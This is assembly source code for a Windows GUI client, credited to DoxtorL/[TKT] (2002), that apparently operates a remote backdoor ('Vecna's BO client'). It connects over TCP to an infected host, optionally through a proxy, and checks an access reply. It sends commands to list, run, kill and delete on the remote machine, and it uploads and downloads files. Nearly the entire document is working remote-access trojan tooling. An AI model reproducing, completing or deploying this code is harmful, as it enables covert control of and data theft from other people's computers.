;Vecna's BO client v 1.0 by DoxtorL. /[TKT] May 2002

APPENDSTR proc ;append to print buffer an asciiz string
cld
pop eax
pop ebx
push eax

;search the end of viewbuffer
mov ecx,MAXVIEW
lea edi,viewbuff
xor eax,eax
repne scasb
dec edi

;is there enough bytes left to print text?
push edi
mov edi,ebx
xor eax,eax
repne scasb
pop edi

or ecx,ecx
jnz aplb2   

;not enough bytes left,cleanup viewbuff

xor eax,eax
lea edi,viewbuff
push edi            ;save start of viewbuffer
mov ecx,MAXVIEW
rep stosb
pop edi              ;restore start of viewbuffer

;lets append "texte" to viewbuffer:
aplb2:                 
mov esi,ebx

aplb1:
lodsb
stosb
or eax,eax
jnz aplb1
ret
endp



;send message to editcontrol to print updated viewbuffer:

PRINT proc
pop eax
pop ebx
push eax

pushad
call APPENDSTR,ebx
call APPENDSTR,offset CRLFZ
call SendMessageA,hwedit1,WM_SETTEXT,0,offset viewbuff
call GetScrollRange,hwedit1,SB_VERT,offset minpos,offset maxpos
sub maxpos,21
call SendMessageA,hwedit1,EM_LINESCROLL,0,maxpos
popad
ret
PRINT endp

;send message to editcontrol to print updated viewbuffer:
PRINTNCRLF proc
pop eax
pop ebx
push eax
pushad
call APPENDSTR,ebx
call SendMessageA,hwedit1,WM_SETTEXT,0,offset viewbuff

call GetScrollRange,hwedit1,SB_VERT,offset minpos,offset maxpos
sub maxpos,21
call SendMessageA,hwedit1,EM_LINESCROLL,0,maxpos
popad
ret
endp

dlg_init proc

call LoadIconA,hInst,IDI_ICON
call SendMessageA,hwnd,WM_SETICON,ICON_SMALL+ICON_BIG,eax
mov flagD,FALSE
mov flagF,FALSE
mov flagFT,FALSE

mov ofn.lStructSize,SIZE ofn 
push hwnd
pop ofn.hwndOwner 
push hInst
pop ofn.hInstance 
mov ofn.lpstrFilter,offset szfilter
mov ofn.lpstrFile,offset szbuffer 
mov ofn.nMaxFile,MAXPATH

call GetDlgItem,hwnd,IDC_EDIT1
mov hwedit1,eax

call GetDlgItem,hwnd,IDC_EDIT2
mov hwedit2,eax

call GetDlgItem,hwnd,IDC_EDIT3
mov hwedit3,eax

call GetDlgItem,hwnd,IDC_EDIT4
mov hwedit4,eax

call SetWindowLongA,hwedit2,GWL_WNDPROC,offset DlgNewCmdProc
mov lpoldcmdproc,eax
call PRINT,offset sign
call SetFocus,hwedit2
ret
dlg_init endp


ascii2hex proc ;szport,offset port
;convert the port asciiz string to hex:
pop eax          ;return value
pop ebx          ;szport
pop ecx          ;offset port
push eax          
push ecx         

xor eax,eax
mov ecx,6
mov esi,ebx
push -1
read_figure:
lodsb
cmp al,0
jz read_end
sub al,'0'       ;ascii code to digit value
push eax
loop read_figure
read_end: 

;ebx=start of ascii string for port number
mov esi,ebx
xor ebx,ebx      ;ebx=1
inc ebx

xor ecx,ecx      ;ecx=0
a2h:
pop eax
cmp eax,-1       ;last figure read?
jz a2h_done
xor edx,edx      
mul ebx          ;eax<-eax*ebx
add ecx,eax      
mov eax,10
xor edx,edx      
mul ebx
mov ebx,eax
jmp a2h

a2h_done:
pop eax
mov [eax],ecx
ret
ascii2hex endp

dlg_initconnect proc


;read  port,ip:

call PRINTNCRLF,offset msg_remote
call PRINT_IP_PORT,offset ipadd,offset szport,hwedit4,hwedit3




mov flagFT,FALSE
cmp flagF,TRUE
jnz no_firewall1

mov flagFT,TRUE

;convert port, asciiz to the right format:
call ascii2hex,offset szport,offset port
call htons,port
mov proxy_port,ax   

;convert ip, asciiz to the right format:
call inet_addr, offset ipadd
mov proxy_ip,eax 

no_firewall1:

;start winsock stuff:
call WSAStartup,101h,offset WSADATA

;open a socket:
call socket,AF_INET,SOCK_STREAM,IPPROTO_TCP
mov hSocket,eax

;no-blocking mode set, Windows fashion:
call WSAAsyncSelect,hSocket,hwnd,WM_SOCKET,FD_CONNECT+FD_READ+FD_CLOSE


cmp flagF,TRUE
jz firewall

;convert port, asciiz to the right format:

call ascii2hex,offset szport,offset port
call htons,port
mov sockadd.sin_port,ax   


;convert ip, asciiz to the right format:
call inet_addr, offset ipadd
mov sockadd.sin_addr,eax 

firewall:

;connection:
call connect,hSocket,offset sockadd,SIZE sockaddr_in



exit_dlg_initconnect:
ret
dlg_initconnect endp


dlg_disconnection proc
call closesocket,hSocket
call WSACleanup
ret
dlg_disconnection endp


dlg_read proc
pushad
cleanbuf:
cld
xor eax,eax
mov ecx,1001
lea edi,buffer
rep stosd


;receive datas:

lea esi,buffer
call recv, hSocket,esi,MAXBUFF,0 
cmp flagD,TRUE
jz download_in_progress

cmp flagFT,TRUE
jnz exit_no_dload

mov flagFT,FALSE

cmp word ptr [esi],05a00h
jnz access_no_granted
call PRINT,offset msg_access_granted
popad
ret

access_no_granted:
call PRINT,offset msg_access_refused
popad
ret

exit_no_dload:
call PRINT,offset buffer
popad
ret

download_in_progress:
cmp fsize,0
jnz not_1st_bytes_recv


mov ecx,dword ptr [esi] ;size is the first dword
cmp ecx,"![ ?"          ;prompt received?
jnz file_dload
mov flagD,FALSE
call PRINT,offset msg_dl_error
call CloseHandle,hFile
call DeleteFileA,offset errorfilename
jmp exit_no_dload

file_dload:

inc esi       ;we dont want the size to be in the file
inc esi
inc esi
inc esi

mov fsize,ecx
dec eax      ;sub eax,4: to take into account the dword for the file size 
dec eax
dec eax
dec eax

not_1st_bytes_recv:
cmp eax,fsize
jb only_good_byte_recv      ;number of bytes received<=nb bytes left
mov flagD,FALSE
jz dont_print               ;number of bytes received=nb bytes left
mov edi,esi
add edi,fsize
call PRINT,edi
dont_print:
mov eax,fsize
mov fsize,0
jmp write_disk

only_good_byte_recv:
sub fsize,eax

write_disk:

call WriteFile,hFile,esi,eax,offset nbread,0
lea esi,buffer

cmp fsize,0
jnz dont_close_file
call CloseHandle,hFile
dont_close_file:
popad
ret
dlg_read endp

dlg_exit proc
call EndDialog,hwnd,NULL
ret
dlg_exit endp




PARSE proc


pushad
call SendMessageA,hwedit2,WM_GETTEXT,MAX_CMD,offset cmd 
call SendMessageA,hwedit2,WM_SETTEXT,0,offset prompt

mov flagP,TRUE       
lea esi,cmd
lodsb
or al,al
jz _void

cmp al,'!'
jnz badcmd
lodsd

_dir:
cmp eax," rid"
jnz _upld
;
jmp _done
;end dir

_upld:
cmp eax,"dlpu"
jnz _down
lodsb
cmp al,20h
jnz badcmd
mov flagP,FALSE
_upld2:
lodsb
cmp al,20h
jz _upld2
cmp al,0
jz badcmd
;found 1st string:
dec esi
mov ebx,esi
_upld3:
lodsb
cmp al,0
jz badcmd
cmp al,20h
jnz _upld3
;found end of 1st string,make the string to be an asciiz one:
mov byte ptr [esi-1],0
_upld4:
lodsb
cmp al,0
jz badcmd
cmp al,20h
jz _upld4

;found 2nd string:
dec esi
mov edx,esi
_upld5:
lodsb
cmp al,0
jz end_upld   ;found end of 2nd string
cmp al,20h
jnz _upld5    ;found end of 2nd string
mov byte ptr [esi-1],0
end_upld:


call UPLOAD,ebx,edx
jmp already_sent
;end upld

_down:
cmp eax,"nwod"
jnz _run
lodsb
cmp al,20h
jnz badcmd

mov flagP,FALSE
_dwn2:
lodsb
cmp al,20h
jz _dwn2
cmp al,0
jz badcmd
;found 1st string:
dwn3:
lodsb
cmp al,0
jz badcmd
cmp al,20h
jnz dwn3
;found end of 1st string,make the string to be an asciiz one:
mov byte ptr [esi-1],0
dwn4:
lodsb
cmp al,0
jz badcmd
cmp al,20h
jz dwn4

;found 2nd string:
dec esi
mov ebx,esi
dwn5:
lodsb
cmp al,0
jz end_download   ;found end of 2nd string
cmp al,20h
jnz dwn5    ;found end of 2nd string
mov byte ptr [esi-1],0
end_download:

call lstrcpy,offset errorfilename,ebx
call CreateFileA,ebx,GENERIC_WRITE,0,0,CREATE_NEW,0,0
cmp eax,INVALID_HANDLE_VALUE
jnz file_dont_exist

call PRINT,ebx
call PRINT,offset msg_file_already_exist
jmp already_sent

file_dont_exist:
mov hFile,eax
mov flagD,TRUE
mov fsize,0
jmp _done
;end down

_run:
cmp eax," nur"
jnz _list
;
jmp _done
;end run

_list:
cmp eax,"tsil"
jnz _kill
;
jmp _done
;end list


_kill:
cmp eax,"llik"
jnz _del
lodsb
cmp al,20h
jnz badcmd
;
jmp _done
;end kill

_del:
cmp eax," led"
jnz _exit
;
jmp _done
;end del

_exit:
cmp eax,"tixe"
jnz badcmd
;end exit

_done:
call lstrlenA,offset cmd
inc eax
call send,hSocket,offset cmd,eax,0
already_sent:
cmp flagP,TRUE
jnz _void
call PRINT,offset cmd
popad
ret
badcmd:
call PRINT,offset cmd
call PRINT,offset msg_badcmd
_void:
popad
ret
PARSE    endp


UPLOAD proc ;calling: call UPLOAD ,destination,source
pop eax     ;get return addr
pop esi     ;destination
pop ebx     ;source
push eax

pushad
call CreateFileA,ebx,GENERIC_READ,0,0,OPEN_EXISTING,0,0
cmp eax,INVALID_HANDLE_VALUE
jz exit_error
mov ebx,eax
lea edi,buffer
mov ax,'u!'
stosw
mov eax," dlp"
stosd
ulb1:
lodsb
cmp al,0
jz ulb2
stosb
jmp ulb1

ulb2:
mov al,20h
stosb
push edi
call GetFileSize,ebx,0
call _wsprintfA,edi,offset szformat,eax
add esp,3*4
pop edi
add edi,eax
xor eax,eax
stosb

call lstrlenA,offset buffer
inc eax
call send,hSocket,offset buffer,eax,0
call Sleep,100

ulb3:
call ReadFile,ebx,offset buffer,MAXBUFF,offset nbread,0
cmp nbread,0
jz uexit
call send,hSocket,offset buffer,nbread,0
jmp ulb3
exit_error:
call PRINT,ebx
call PRINT,offset msg_file_not_found
popad
ret
uexit:
call CloseHandle,ebx
popad
ret
endp

PRINT_IP_PORT proc
pop eax
pop esi     ;ip
pop edi     ;port
pop ebx
pop ecx
push eax
push ecx

call SendMessageA,ebx,WM_GETTEXT,10,edi
call PRINTNCRLF,offset msg_port
call PRINTNCRLF,edi
pop ebx
call SendMessageA,ebx,WM_GETTEXT,15,esi
call PRINTNCRLF,offset msg_ip
call PRINT,esi
ret
endp